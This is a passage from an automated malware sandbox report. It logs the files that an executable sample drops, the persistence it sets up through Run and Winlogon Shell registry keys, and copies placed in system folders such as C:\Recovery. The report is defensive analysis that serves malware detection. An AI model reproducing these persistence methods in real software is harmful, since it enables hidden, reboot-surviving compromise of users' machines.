                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\hFbfZzNA.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\LHRZphiV.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\dUteJCDk.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\ujtbHYJE.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\NidZFKNk.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\AIflJiPS.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\PxIPwdiO.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exeJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\CeJjFnSo.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\zaakdHBM.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\fePfJVil.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\rWndvGZf.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\npUmXvsj.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\bZqOSDZv.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\kIKeCfec.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\qaACfJCc.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\iuTVQPCp.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\KpOqUOcm.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\zNoaAjFw.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exeJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\dUteJCDk.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\LHRZphiV.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\CeJjFnSo.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\zNoaAjFw.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\urdulIjK.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\kIKeCfec.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\bZqOSDZv.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\JNOIyhEg.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\WepxKXjB.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\ujtbHYJE.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\syOLALyL.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\PxIPwdiO.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\fePfJVil.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\AIflJiPS.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\rWndvGZf.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\QgDirqoj.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\hFbfZzNA.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\NidZFKNk.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\lniDCMno.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\SVvXiHdY.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\qaACfJCc.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\npUmXvsj.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\KpOqUOcm.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\iuTVQPCp.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\zaakdHBM.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\rxSvtOmf.logJump to dropped file

                            Boot Survival

                            barindex
                            Creates an autostart registry key pointing to binary in C:\Windows
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TItoGxsDkTEZBWdlQNGwopiJump to behavior
                            Creates an undocumented autostart registry key
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Creates autostart registry keys with suspicious values (likely registry only malware)
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"Jump to behavior
                            Creates multiple autostart registry keys
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TItoGxsDkTEZBWdlQNGwopiJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run servicesJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run servicesJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run servicesJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TItoGxsDkTEZBWdlQNGwopiJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TItoGxsDkTEZBWdlQNGwopiJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TItoGxsDkTEZBWdlQNGwopiJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TItoGxsDkTEZBWdlQNGwopiJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TItoGxsDkTEZBWdlQNGwopiJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TItoGxsDkTEZBWdlQNGwopiJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TItoGxsDkTEZBWdlQNGwopiJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TItoGxsDkTEZBWdlQNGwopiJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
